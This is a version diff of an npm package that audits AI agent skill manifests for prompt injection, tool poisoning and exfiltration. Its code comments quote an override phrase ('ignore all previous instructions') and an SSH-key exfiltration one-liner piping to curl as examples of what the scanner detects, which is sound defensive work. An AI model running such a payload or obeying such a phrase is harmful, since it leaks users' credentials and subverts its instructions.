@panguard-ai/panguard-skill-auditor 1.6.1 → 1.7.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/dist/checks/atr-check.d.ts +5 -4
- package/dist/checks/atr-check.d.ts.map +1 -1
- package/dist/checks/atr-check.js +36 -15
- package/dist/checks/atr-check.js.map +1 -1
- package/dist/cli.js +17 -2
- package/dist/cli.js.map +1 -1
- package/dist/index.js +1 -1
- package/dist/index.js.map +1 -1
- package/package.json +8 -7
|
@@ -1,8 +1,8 @@
|
|
|
1
1
|
/**
|
|
2
2
|
* ATR (Agent Threat Rules) pattern detection check
|
|
3
3
|
*
|
|
4
|
-
* Evaluates skill manifests against the ATR rule engine (
|
|
5
|
-
* covering prompt injection, tool poisoning, context exfiltration,
|
|
4
|
+
* Evaluates skill manifests against the ATR rule engine (the current ATR
|
|
5
|
+
* ruleset) covering prompt injection, tool poisoning, context exfiltration,
|
|
6
6
|
* agent manipulation, privilege escalation, and CJK-aware patterns.
|
|
7
7
|
*
|
|
8
8
|
* This augments (does NOT replace) existing regex checks in instruction-check.ts.
|
|
@@ -14,8 +14,9 @@ import type { CheckResult, SkillManifest } from '../types.js';
|
|
|
14
14
|
* Run ATR engine checks against a parsed skill manifest.
|
|
15
15
|
*
|
|
16
16
|
* Evaluates:
|
|
17
|
-
* 1. Skill instructions
|
|
18
|
-
*
|
|
17
|
+
* 1. Skill instructions via scanSkill (all rules fire) + llm_input (recovers
|
|
18
|
+
* single-pattern prompt-injection rules scanSkill's FP gate suppresses)
|
|
19
|
+
* 2. Skill description via the same dual path
|
|
19
20
|
* 3. MCP tool descriptions (if present in metadata) as tool_call events
|
|
20
21
|
*
|
|
21
22
|
* Returns a CheckResult compatible with the Skill Auditor pipeline.
|
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"atr-check.d.ts","sourceRoot":"","sources":["../../src/checks/atr-check.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;GAUG;AAMH,OAAO,KAAK,EAAgB,WAAW,EAAE,aAAa,EAAE,MAAM,aAAa,CAAC;
|
|
1
|
+
{"version":3,"file":"atr-check.d.ts","sourceRoot":"","sources":["../../src/checks/atr-check.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;GAUG;AAMH,OAAO,KAAK,EAAgB,WAAW,EAAE,aAAa,EAAE,MAAM,aAAa,CAAC;AAkK5E;;;;;;;;;;GAUG;AACH,wBAAsB,YAAY,CAChC,QAAQ,EAAE,aAAa,EACvB,UAAU,CAAC,EAAE,KAAK,CAAC;IAAE,EAAE,EAAE,MAAM,CAAC;IAAC,KAAK,EAAE,MAAM,CAAC;IAAC,SAAS,EAAE,OAAO,CAAC;IAAC,CAAC,GAAG,EAAE,MAAM,GAAG,OAAO,CAAA;CAAE,CAAC,GAC5F,OAAO,CAAC,WAAW,CAAC,CA+ItB"}
|
package/dist/checks/atr-check.js
CHANGED
|
@@ -1,8 +1,8 @@
|
|
|
1
1
|
/**
|
|
2
2
|
* ATR (Agent Threat Rules) pattern detection check
|
|
3
3
|
*
|
|
4
|
-
* Evaluates skill manifests against the ATR rule engine (
|
|
5
|
-
* covering prompt injection, tool poisoning, context exfiltration,
|
|
4
|
+
* Evaluates skill manifests against the ATR rule engine (the current ATR
|
|
5
|
+
* ruleset) covering prompt injection, tool poisoning, context exfiltration,
|
|
6
6
|
* agent manipulation, privilege escalation, and CJK-aware patterns.
|
|
7
7
|
*
|
|
8
8
|
* This augments (does NOT replace) existing regex checks in instruction-check.ts.
|
|
@@ -88,16 +88,22 @@ function resolveRulesDir() {
|
|
|
88
88
|
return resolve(thisDir, '..', '..', '..', 'atr', 'rules');
|
|
89
89
|
}
|
|
90
90
|
/**
|
|
91
|
-
* Build an AgentEvent
|
|
91
|
+
* Build an llm_input AgentEvent for ATR evaluation.
|
|
92
|
+
*
|
|
93
|
+
* Used ALONGSIDE engine.scanSkill — not instead of it. scanSkill (scanContext
|
|
94
|
+
* 'skill') fires the mcp/tool rules but applies a 2+-compound-condition FP gate
|
|
95
|
+
* that suppresses single-pattern prompt-injection rules. The llm_input path has
|
|
96
|
+
* no such gate, so it recovers those short injection phrases ("ignore all
|
|
97
|
+
* previous instructions", persona/delimiter overrides, CJK injections). The two
|
|
98
|
+
* result sets are merged and deduplicated by rule ID.
|
|
92
99
|
*/
|
|
93
|
-
function
|
|
100
|
+
function buildLlmInputEvent(content) {
|
|
94
101
|
return {
|
|
95
102
|
type: 'llm_input',
|
|
96
103
|
timestamp: new Date().toISOString(),
|
|
97
104
|
content,
|
|
98
105
|
fields: {
|
|
99
106
|
user_input: content,
|
|
100
|
-
...(toolName ? { tool_name: toolName } : {}),
|
|
101
107
|
},
|
|
102
108
|
};
|
|
103
109
|
}
|
|
@@ -145,8 +151,9 @@ function matchesToFindings(matches) {
|
|
|
145
151
|
* Run ATR engine checks against a parsed skill manifest.
|
|
146
152
|
*
|
|
147
153
|
* Evaluates:
|
|
148
|
-
* 1. Skill instructions
|
|
149
|
-
*
|
|
154
|
+
* 1. Skill instructions via scanSkill (all rules fire) + llm_input (recovers
|
|
155
|
+
* single-pattern prompt-injection rules scanSkill's FP gate suppresses)
|
|
156
|
+
* 2. Skill description via the same dual path
|
|
150
157
|
* 3. MCP tool descriptions (if present in metadata) as tool_call events
|
|
151
158
|
*
|
|
152
159
|
* Returns a CheckResult compatible with the Skill Auditor pipeline.
|
|
@@ -201,17 +208,31 @@ export async function checkWithATR(manifest, cloudRules) {
|
|
|
201
208
|
};
|
|
202
209
|
}
|
|
203
210
|
const allMatches = [];
|
|
204
|
-
// 1. Scan instructions
|
|
205
|
-
//
|
|
206
|
-
//
|
|
211
|
+
// 1. Scan instructions via the SKILL entry point (scanContext: 'skill').
|
|
212
|
+
// This fires ALL rules cross-context — including the mcp_exchange /
|
|
213
|
+
// tool_call rules (credential theft, RCE, exfil, path traversal) that
|
|
214
|
+
// engine.evaluate({type:'llm_input'}) silently filters out because
|
|
215
|
+
// llm_input maps to source 'llm_io'. scanSkill also applies the
|
|
216
|
+
// cross-context confidence*0.6 discount, the 2+-compound-condition FP
|
|
217
|
+
// gate, and base64-decode scanning. A SKILL.md body is skill content,
|
|
218
|
+
// not an llm_io turn — using only llm_input here reported live malware
|
|
219
|
+
// (e.g. "cat ~/.ssh/id_rsa | curl evil") as "clean" while the runtime
|
|
220
|
+
// hook denied the same payload.
|
|
221
|
+
//
|
|
222
|
+
// We ALSO run an llm_input evaluate over the same text and merge the
|
|
223
|
+
// results: scanSkill's FP gate suppresses single-pattern prompt-injection
|
|
224
|
+
// rules ("ignore all previous instructions", persona/delimiter overrides,
|
|
225
|
+
// CJK injections) that the ungated llm_input path catches. Running both
|
|
226
|
+
// and deduping by rule ID (in matchesToFindings) keeps the mcp/tool
|
|
227
|
+
// coverage without losing prompt-injection coverage.
|
|
207
228
|
if (manifest.instructions) {
|
|
208
|
-
|
|
209
|
-
allMatches.push(...
|
|
229
|
+
allMatches.push(...engine.scanSkill(manifest.instructions));
|
|
230
|
+
allMatches.push(...engine.evaluate(buildLlmInputEvent(manifest.instructions)));
|
|
210
231
|
}
|
|
211
|
-
// 2. Scan description as
|
|
232
|
+
// 2. Scan description through both paths as well.
|
|
212
233
|
if (manifest.description) {
|
|
213
|
-
|
|
214
|
-
allMatches.push(...
|
|
234
|
+
allMatches.push(...engine.scanSkill(manifest.description));
|
|
235
|
+
allMatches.push(...engine.evaluate(buildLlmInputEvent(manifest.description)));
|
|
215
236
|
}
|
|
216
237
|
// 3. Scan MCP tool descriptions (if metadata includes them)
|
|
217
238
|
const mcpTools = manifest.metadata?.['mcp_tools'];
|
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"atr-check.js","sourceRoot":"","sources":["../../src/checks/atr-check.ts"],"names":[],"mappings":"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
|
|
1
|
+
{"version":3,"file":"atr-check.js","sourceRoot":"","sources":["../../src/checks/atr-check.ts"],"names":[],"mappings":"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"}
|
package/dist/cli.js
CHANGED
|
@@ -9,12 +9,13 @@
|
|
|
9
9
|
* exit on findings.
|
|
10
10
|
*/
|
|
11
11
|
import { auditSkill } from './index.js';
|
|
12
|
+
import { setLogLevel } from '@panguard-ai/core';
|
|
12
13
|
import { readdir, stat } from 'node:fs/promises';
|
|
13
14
|
import { join, resolve } from 'node:path';
|
|
14
15
|
import { existsSync } from 'node:fs';
|
|
15
16
|
function parseArgs(argv) {
|
|
16
17
|
const opts = {
|
|
17
|
-
dir:
|
|
18
|
+
dir: undefined,
|
|
18
19
|
json: false,
|
|
19
20
|
failOn: null,
|
|
20
21
|
fleet: false,
|
|
@@ -101,7 +102,21 @@ async function findSkillDirs(parent) {
|
|
|
101
102
|
}
|
|
102
103
|
async function main() {
|
|
103
104
|
const opts = parseArgs(process.argv.slice(2));
|
|
104
|
-
|
|
105
|
+
// No target specified: do NOT silently audit the current working directory.
|
|
106
|
+
// Without --dir (and not in --fleet mode) there is nothing to scan; show
|
|
107
|
+
// usage and exit non-zero so scripts treat it as an invalid invocation.
|
|
108
|
+
if (opts.dir === undefined && !opts.fleet) {
|
|
109
|
+
printHelp();
|
|
110
|
+
process.exit(2);
|
|
111
|
+
}
|
|
112
|
+
// On the human (non-JSON) output path, suppress the internal panguard-scan:*
|
|
113
|
+
// structured JSON logger so its debug lines never reach an end user. JSON
|
|
114
|
+
// mode keeps logs on stderr (separate from the machine-readable stdout), and
|
|
115
|
+
// an explicit PANGUARD_LOG_LEVEL override is always honoured.
|
|
116
|
+
if (!opts.json && process.env['PANGUARD_LOG_LEVEL'] === undefined) {
|
|
117
|
+
setLogLevel('silent');
|
|
118
|
+
}
|
|
119
|
+
const dir = resolve(opts.dir ?? '.');
|
|
105
120
|
if (!existsSync(dir)) {
|
|
106
121
|
console.error(`Directory not found: ${dir}`);
|
|
107
122
|
process.exit(2);
|
package/dist/cli.js.map
CHANGED
|
@@ -1 +1 @@
|
|
|
1
|
-
